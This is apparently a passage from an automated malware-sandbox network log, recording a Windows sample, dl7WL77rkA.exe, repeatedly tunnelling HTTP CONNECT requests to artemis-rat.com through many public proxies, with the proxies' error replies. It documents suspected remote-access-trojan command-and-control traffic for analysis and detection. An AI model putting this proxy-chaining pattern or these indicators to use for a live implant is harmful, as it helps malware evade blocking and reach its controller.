                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.440448999 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            839192.168.2.55236938.162.10.14831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.815742016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.250710011 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            840192.168.2.55230798.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.815743923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            841192.168.2.55235692.204.135.203108243876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.815937996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.405045033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.201900959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.702075005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592792988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405349016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            842192.168.2.550022192.99.207.129293603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.830185890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939110994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083456993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.217669964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            843192.168.2.552318192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.870594978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            844192.168.2.55227943.133.136.20888003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.874052048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            845192.168.2.55225445.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.878757954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            846192.168.2.55177513.81.217.201803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.878760099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.572294950 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 618
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform the
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.572314978 CET274IN
                                                                                                                                                                                                                                                            Data Ascii: m of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Por


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            847192.168.2.55167837.187.77.58525933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.883446932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            848192.168.2.5518095.161.231.34803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.896377087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.115111113 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            849192.168.2.55228960.211.195.150108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.896644115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701905012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            850192.168.2.552333163.172.171.22163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.903270960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.735977888 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            851192.168.2.55231339.108.229.1480023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.918965101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.245106936 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            852192.168.2.552321220.248.70.23790023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.920027018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.249521017 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            853192.168.2.55181524.249.199.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.923384905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            854192.168.2.55234934.92.12.21092383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.933240891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.249002934 CET28INHTTP/1.1 502 Bad Gateway


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            855192.168.2.552362119.28.60.6480903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.934093952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            856192.168.2.552383157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.948085070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            857192.168.2.551825129.213.150.20580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.960474968 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            858192.168.2.55233251.161.131.84437123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.043586969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            859192.168.2.550593103.97.179.11510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.048041105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            860192.168.2.552379174.77.111.198495473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.049576044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            861192.168.2.550356199.102.106.9441453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.049643040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            862192.168.2.552387194.4.50.132123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.052906990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            863192.168.2.55007537.52.50.2856783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.053620100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            864192.168.2.55235445.139.11.200803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.054394007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.435652971 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            865192.168.2.552366195.158.8.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.054955006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.905030966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093163013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.499154091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
